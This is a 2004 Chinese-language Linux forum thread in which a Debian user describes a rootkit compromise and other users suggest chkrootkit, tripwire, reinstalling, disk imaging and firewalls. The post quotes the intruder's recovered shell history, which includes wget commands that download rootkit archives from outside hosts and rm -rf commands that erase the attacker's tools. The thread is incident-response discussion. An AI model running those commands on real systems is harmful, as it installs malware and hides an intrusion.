偶的Debian中招了！帮忙看看！

zubin006 · 发表于 2004-12-22 13:11:02

今天来公司发现偶无法使用phpMyAdmin进入Mysql进行操作，觉得不对劲，就准备想用rhkhunter检查一下

系统有没有中了root kit，没想到竞然不能运行，我倒！ps -auxf发现几个不正常的进程在跑！

想想可能中扫了！那个小样的已经侵入我的主机了！
顺便说一下，我的系统是Debian 3.0rc1，不过昨天刚使用apt-get upgrade了，不过昨天好像就有发现有

几个不正常的进程在跑！

看一下可能被黑客更换的几个二进制程序/bin/ls /bin/cp等，发现文件大小都变了，同时文件的时间也

变了，晕真的中招了！

我查了/var/log/syslog中的信息，没有找到任何线索！
再看一下我的/root/.bash_history，在里面我到到了几个命令！

wget www.wget.as.ro/kit.tgz
tar zxvf kit.tgz
ls
rm -rf toy toy.tgz voda wpe aa.o cc.o cleaner
ls
cd s
cd sl2y
rm -rf toy toy.tgz voda wpe aa.o cc.o cleaner sl2y sl3y s smurf5 st str.sh
ls
tar zxvf kit.tgz
rm -rf kit.tgz
cd /var/tmp
ls
rm -rf xpl xpl.tgz
wget puidedrac.org/rk.tgz;tar
wget www.wget.as.ro/kit.tgz
tar -zxvf kit.tgz
ls
tar zxvf kit.tgz

KAO，中招了！
我用另一PC下载了这个kit.tgz，解压后看了几个文件，再看了setup的文件，我倒！整个系统被改了乱七

八糟！

我大致了解了，我这台主机被入侵的过程，

1.取得root权限 [但不知他是如何取的，我想可能是我系统中的那个软件有BUG吧，高手请指教！]

2.下载kit.tgz

然后就运行这里面的setup文件，把很多命令程序都给调包了！

3.由于我的主板是动态IP，这个黑客要长期控制我的主机的话，他必须知道我的主机的当前IP的地址，因

此我使用netstat -tal[之前我已经停了所有的服务，ssh除外，偶要登录！]：
发现我的主机总是在连207.66.155.21:80，我想可能，对方肯定在我的机器里下了一个木马，一直连

207.66.155.21主机的HTTP以确定偶的主机的当前IP！

惨！

不知哪位仁兄有被入侵的经验！
我暂不想重装，想查看是如何被入侵的！
同时我想重装ls所属的软件，以及其它均会发生错误！但不知如何解决！请帮助[重装整个系统除外的方

法]现在偶连装软件都有困难！

仁兄们，可能给偶一些相关的入侵的资料，让偶看一下！感激！

rtdebian · 发表于 2004-12-22 13:35:06

搬张凳子坐着看看，我也希望找到一个防木马和入侵的软件。

hantsy · 发表于 2004-12-22 13:38:51

chkrootkit查一下。。。

高原之狼 · 发表于 2004-12-22 14:39:31

Post by zubin006

顺便说一下，我的系统是Debian 3.0rc1，不过昨天刚使用apt-get upgrade了，不过昨天好像就有发现有几个不正常的进程在跑！

重要的机器永远要在防火墙后面装，一切都更新好以后再连 Internet。

Post by zubin006

不知哪位仁兄有被入侵的经验！
我暂不想重装，想查看是如何被入侵的！
同时我想重装ls所属的软件，以及其它均会发生错误！但不知如何解决！请帮助[重装整个系统除外的方法]现在偶连装软件都有困难！

仁兄们，可能给偶一些相关的入侵的资料，让偶看一下！感激！

这种情况下唯一安全的办法就是重装。

另外你显然对整个系统不了解，重装可能是最简单的办法。

如果想搞清楚是怎么被入侵的，把整个硬盘做个 image copy 是必经的一步。

http://www.linux-forensics.com/ 看上去是个很有用的网站。

hiweed · 发表于 2004-12-22 14:57:26

安装 tripwire 吧，有了它，哪个文件被修改，一目了然。

zubin006 · 发表于 2004-12-22 15:53:16

谢谢上面的仁兄指教！

幸亏偶的这台机器是用来试验用的，没有什么重要的资料！
不过我的机器都是裸露在外面！
这次要规划一下了！
拿一台LINUX做防火墙，服务器放在后面！这样会好全一些了！

gan007 · 发表于 2004-12-22 16:55:33

中过一次, 可能是木马, 后来被我用rav8杀掉了. 在公社下的.

杀了后, 接着改密码. 之后我就用kde中自带的kcron 定期做tripwire 一天一次. kaspersky 一星期杀一次

毒. 防火强用firestarter 要比用iptables设置容易的多.

faint · 发表于 2004-12-22 17:05:42

连基本的命令都被替换了，我想除了重装，没有办法。

faint · 发表于 2004-12-22 17:10:25

firestarter是gui模式的啊，可惜很多linux服务器都没有装X。。

faint · 发表于 2004-12-22 17:16:17

Post by hantsy
chkrootkit查一下。。。

chkrootkit今天又有更新，update了一把。。

		自动登录	找回密码
密码			注册